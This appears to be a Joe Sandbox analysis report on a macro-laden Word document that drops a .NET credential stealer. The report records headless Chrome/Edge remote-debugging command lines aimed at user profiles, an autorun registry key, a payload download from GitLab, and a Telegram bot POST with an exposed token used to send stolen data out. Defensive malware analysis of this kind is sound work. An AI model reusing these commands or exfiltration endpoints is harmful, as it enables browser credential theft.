Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
q9JZUaS1Gy.doc

Overview

General Information

Sample name:q9JZUaS1Gy.doc
renamed because original name is a hash value
Original sample name:0f53abadce48014ec8ea5458af9b732ed1ea6d612b54b261a0e60928e36e86f1.doc
Analysis ID:1590807
MD5:f8de9b2f8b9088be3dda1985fe7b20c3
SHA1:edba0fb7fdd51294bf183a8d7ab8992bb1762ff5
SHA256:0f53abadce48014ec8ea5458af9b732ed1ea6d612b54b261a0e60928e36e86f1
Tags:app8490744dochko247blackuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Multi AV Scanner detection for submitted file
Sigma detected: Office product drops executable at suspicious location
Suricata IDS alerts for network traffic
Creates an autostart registry key pointing to binary in C:\Windows
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document exploit detected (process start blacklist hit)
Drops PE files to the document folder of the user
Machine Learning detection for dropped file
Machine Learning detection for sample
Office process drops PE file
Office process queries suspicious COM object (likely to drop second stage)
Sigma detected: Potential Data Stealing Via Chromium Headless Debugging
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Tries to harvest and steal browser information (history, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains an embedded VBA which might only executes on specific systems (country or language check)
Document contains embedded VBA macros
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Searches for user specific document files
Sigma detected: Browser Execution In Headless Mode
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
query blbeacon for getting browser version

Classification

Process Tree

  • System is w10x64
  • WINWORD.EXE (PID: 4560 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
    • example.exe (PID: 8044 cmdline: "C:\Users\user\Documents\example.exe" MD5: 63B58E59519DB03CE6D393681D4442A8)
      • chrome.exe (PID: 1224 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9671 --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --headless --disable-dev-shm-usage --no-sandbox MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
        • chrome.exe (PID: 364 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1596 --field-trial-handle=1428,i,3801852905394736153,15773183459948505587,262144 --disable-features=PaintHolding /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
      • msedge.exe (PID: 7380 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9440 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --headless --disable-dev-shm-usage --no-sandbox MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 4212 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1596 --field-trial-handle=1452,i,15901008811036505322,11518475085640953026,262144 --disable-features=PaintHolding /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • rundll32.exe (PID: 3600 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: example.exe PID: 8044JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: Potential Data Stealing Via Chromium Headless Debugging
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9671 --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --headless --disable-dev-shm-usage --no-sandbox, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9671 --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --headless --disable-dev-shm-usage --no-sandbox, CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Documents\example.exe" , ParentImage: C:\Users\user\Documents\example.exe, ParentProcessId: 8044, ParentProcessName: example.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9671 --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --headless --disable-dev-shm-usage --no-sandbox, ProcessId: 1224, ProcessName: chrome.exe
    Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
    Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\Documents\example.exe" , CommandLine: "C:\Users\user\Documents\example.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\Documents\example.exe, NewProcessName: C:\Users\user\Documents\example.exe, OriginalFileName: C:\Users\user\Documents\example.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 4560, ParentProcessName: WINWORD.EXE, ProcessCommandLine: "C:\Users\user\Documents\example.exe" , ProcessId: 8044, ProcessName: example.exe
    Sigma detected: Browser Execution In Headless Mode
    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9671 --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --headless --disable-dev-shm-usage --no-sandbox, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9671 --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --headless --disable-dev-shm-usage --no-sandbox, CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Documents\example.exe" , ParentImage: C:\Users\user\Documents\example.exe, ParentProcessId: 8044, ParentProcessName: example.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9671 --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --headless --disable-dev-shm-usage --no-sandbox, ProcessId: 1224, ProcessName: chrome.exe
    Sigma detected: Browser Started with Remote Debugging
    Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9671 --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --headless --disable-dev-shm-usage --no-sandbox, CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9671 --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --headless --disable-dev-shm-usage --no-sandbox, CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Documents\example.exe" , ParentImage: C:\Users\user\Documents\example.exe, ParentProcessId: 8044, ParentProcessName: example.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9671 --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --headless --disable-dev-shm-usage --no-sandbox, ProcessId: 1224, ProcessName: chrome.exe
    Sigma detected: CurrentVersion Autorun Keys Modification
    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "", EventID: 13, EventType: SetValue, Image: C:\Users\user\Documents\example.exe, ProcessId: 8044, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update
    Sigma detected: Suspicious Office Outbound Connections
    Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.10, DestinationIsIpv6: false, DestinationPort: 49713, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Initiated: true, ProcessId: 4560, Protocol: tcp, SourceIp: 172.65.251.78, SourceIsIpv6: false, SourcePort: 443

    Data Obfuscation

    barindex
    Sigma detected: Office product drops executable at suspicious location
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 4560, TargetFilename: C:\Users\user\Documents\example.exe

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-14T15:43:49.691091+010020226401A Network Trojan was detected172.65.251.78443192.168.2.1049713TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-14T15:47:13.294323+010028033053Unknown Traffic192.168.2.1049735208.95.112.180TCP
    2025-01-14T15:47:14.638099+010028033053Unknown Traffic192.168.2.1049735208.95.112.180TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Multi AV Scanner detection for submitted file
    Source: q9JZUaS1Gy.docVirustotal: Detection: 53%Perma Link
    Source: q9JZUaS1Gy.docReversingLabs: Detection: 39%
    Machine Learning detection for dropped file
    Source: C:\Users\user\Desktop\~WRD0000.tmpJoe Sandbox ML: detected
    Machine Learning detection for sample
    Source: q9JZUaS1Gy.docJoe Sandbox ML: detected
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
    Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.10:49713 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.10:49733 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49739 version: TLS 1.2
    Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Csp/Release/net8.0-windows/System.Security.Cryptography.Csp.pdbSHA256 source: example.exe, 0000000C.00000002.3647342033.000001D6D44D0000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdbSHA256~\{^ source: example.exe, 0000000C.00000002.3644852440.000001963DA40000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdb source: example.exe, 0000000C.00000002.3648392319.000001D6D51E0000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: /_/artifacts/obj/System.Runtime.InteropServices.RuntimeInformation/Release/net8.0-windows/System.Runtime.InteropServices.RuntimeInformation.pdb source: example.exe, 0000000C.00000002.3647038849.000001D6D4390000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: bD:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: example.exe, 0000000C.00000002.3645897805.0000019641C02000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: aC:\dev\sqlite\dotnet-private\System.Data.SQLite\obj\Release\netstandard2.1\System.Data.SQLite.pdb source: example.exe, 0000000C.00000002.3645897805.0000019641C02000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: System.Runtime.InteropServices.ni.pdb source: example.exe, 0000000C.00000002.3648255484.000001D6D5180000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3648304673.000001D6D51A1000.00000020.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.StackTrace\Release\net8.0\System.Diagnostics.StackTrace.pdb source: example.exe, 0000000C.00000002.3644724065.000001963D9F0000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: example.exe, 0000000C.00000002.3648556809.000001D6D5201000.00000020.00001000.00020000.00000000.sdmp, example.exe, 0000000C.00000002.3648674007.000001D6D5220000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Compression.ZipFile\Release\net8.0-windows\System.IO.Compression.ZipFile.pdb source: example.exe, 0000000C.00000002.3648814958.000001D6D5280000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Diagnostics.Process.ni.pdb source: example.exe, example.exe, 0000000C.00000002.3647199618.000001D6D4420000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3647262031.000001D6D4481000.00000020.00001000.00020000.00000000.sdmp
    Source: Binary string: System.Private.CoreLib.pdb source: example.exe, 0000000C.00000002.3645897805.0000019641C02000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Csp/Release/net8.0-windows/System.Security.Cryptography.Csp.pdb source: example.exe, 0000000C.00000002.3647342033.000001D6D44D0000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.Lightweight\Release\net8.0\System.Reflection.Emit.Lightweight.pdb source: example.exe, 0000000C.00000002.3648371388.000001D6D51D0000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: example.exe, 0000000C.00000002.3645558187.000001963F311000.00000020.00001000.00020000.00000000.sdmp, example.exe, 0000000C.00000002.3647010977.000001D6D4370000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: /_/artifacts/obj/System.Runtime.InteropServices.RuntimeInformation/Release/net8.0-windows/System.Runtime.InteropServices.RuntimeInformation.pdbSHA256 source: example.exe, 0000000C.00000002.3647038849.000001D6D4390000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: example.exe, 0000000C.00000000.3282635316.00007FF6090DD000.00000002.00000001.01000000.00000004.sdmp, example.exe.0.dr
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\System.Private.CoreLib\x64\Release\System.Private.CoreLib.pdb source: example.exe, 0000000C.00000002.3647365341.000001D6D44E0000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3648900484.000001D6D5381000.00000020.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: example.exe, example.exe, 0000000C.00000002.3647061697.000001D6D43A0000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3647121204.000001D6D43E1000.00000020.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdbSHA256 source: example.exe, 0000000C.00000002.3645137007.000001963DAD0000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: System.IO.Compression.ZipFile.ni.pdb source: example.exe, 0000000C.00000002.3648814958.000001D6D5280000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: HK.pdb source: example.exe, 0000000C.00000002.3644958189.000001963DA62000.00000020.00001000.00020000.00000000.sdmp, example.exe, 0000000C.00000002.3645394042.000001963F290000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdbSHA256 source: example.exe, 0000000C.00000002.3648392319.000001D6D51E0000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: example.exe, 0000000C.00000002.3645558187.000001963F311000.00000020.00001000.00020000.00000000.sdmp, example.exe, 0000000C.00000002.3647010977.000001D6D4370000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: example.exe, 0000000C.00000000.3283694459.00007FF6092B8000.00000002.00000001.01000000.00000004.sdmp, example.exe.0.dr
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.Lightweight\Release\net8.0\System.Reflection.Emit.Lightweight.pdbSHA256 source: example.exe, 0000000C.00000002.3648371388.000001D6D51D0000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Primitives/Release/net8.0-windows/System.Security.Cryptography.Primitives.pdbSHA256 source: example.exe, 0000000C.00000002.3645471398.000001963F300000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: System.Data.SQLite.pdb source: example.exe, 0000000C.00000002.3645897805.0000019641C02000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: example.exe, example.exe, 0000000C.00000002.3647199618.000001D6D4420000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3647262031.000001D6D4481000.00000020.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdb source: example.exe, 0000000C.00000002.3644852440.000001963DA40000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: .C:\Users\user\Documents\System.Data.SQLite.pdbHS source: example.exe, 0000000C.00000002.3645897805.0000019641C02000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: System.Threading.ni.pdb source: example.exe, 0000000C.00000002.3648556809.000001D6D5201000.00000020.00001000.00020000.00000000.sdmp, example.exe, 0000000C.00000002.3648674007.000001D6D5220000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\Release\net8.0\System.Reflection.Primitives.pdb source: example.exe, 0000000C.00000002.3648414415.000001D6D51F0000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Primitives\Release\net8.0\System.Reflection.Primitives.pdbSHA256 source: example.exe, 0000000C.00000002.3648414415.000001D6D51F0000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: example.exe, 0000000C.00000002.3645137007.000001963DAD0000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: example.exe, 0000000C.00000002.3648255484.000001D6D5180000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3648304673.000001D6D51A1000.00000020.00001000.00020000.00000000.sdmp
    Source: Binary string: 2C:\Users\user\Documents\System.Private.CoreLib.pdb source: example.exe, 0000000C.00000002.3645897805.0000019641C02000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: System.Collections.ni.pdb source: example.exe, example.exe, 0000000C.00000002.3647061697.000001D6D43A0000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3647121204.000001D6D43E1000.00000020.00001000.00020000.00000000.sdmp
    Source: Binary string: System.Private.CoreLib.ni.pdb source: example.exe, 0000000C.00000002.3647365341.000001D6D44E0000.00000004.10000000.00040000.00000000.sdmp, example.exe, 0000000C.00000002.3648900484.000001D6D5381000.00000020.00001000.00020000.00000000.sdmp
    Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.Primitives/Release/net8.0-windows/System.Security.Cryptography.Primitives.pdb source: example.exe, 0000000C.00000002.3645471398.000001963F300000.00000004.10000000.00040000.00000000.sdmp
    Source: Binary string: System.Diagnostics.StackTrace.ni.pdb source: example.exe, 0000000C.00000002.3644724065.000001963D9F0000.00000004.10000000.00040000.00000000.sdmp

    Software Vulnerabilities

    barindex
    Document exploit detected (creates forbidden files)
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\Documents\example.exeJump to behavior
    Document exploit detected (drops PE files)
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: example.exe.0.drJump to dropped file
    Document exploit detected (process start blacklist hit)
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Users\user\Documents\example.exe

    Networking

    barindex
    Suricata IDS alerts for network traffic
    Source: Network trafficSuricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 172.65.251.78:443 -> 192.168.2.10:49713
    Uses the Telegram API (likely for C&C communication)
    Source: unknownDNS query: name: api.telegram.org
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
    Source: global trafficHTTP traffic detected: POST /bot6408760648:AAHZHh7YT7kusTgJi5VULHYIyPQmN5QDENw/sendDocument HTTP/1.1Host: api.telegram.orgContent-Type: multipart/form-data; boundary="5ecb3e85-84cd-403b-a726-d9ea4b408d00"Content-Length: 2105
    Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
    Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
    Source: Joe Sandbox ViewJA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3
    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49735 -> 208.95.112.1:80
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /app8490744/updatesa/-/raw/main/up HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gitlab.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
    Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
    Source: global trafficHTTP traffic detected: GET /json/8.46.123.189 HTTP/1.1Host: ip-api.com
    Source: global trafficDNS traffic detected: DNS query: gitlab.com
    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
    Source: global trafficDNS traffic detected: DNS query: ip-api.com
    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
    Source: unknownHTTP traffic detected: POST /bot6408760648:AAHZHh7YT7kusTgJi5VULHYIyPQmN5QDENw/sendDocument HTTP/1.1Host: api.telegram.orgContent-Type: multipart/form-data; boundary="5ecb3e85-84cd-403b-a726-d9ea4b408d00"Content-Length: 2105
    Source: example.exe, 0000000C.00000000.3282635316.00007FF6090DD000.00000002.00000001.01000000.00000004.sdmp, example.exe.0.drString found in binary or memory: http://.css
    Source: example.exe, 0000000C.00000000.3282635316.00007FF6090DD000.00000002.00000001.01000000.00000004.sdmp, example.exe.0.drString found in binary or memory: http://.jpg
    Source: chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
    Source: chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
    Source: chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
    Source: chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
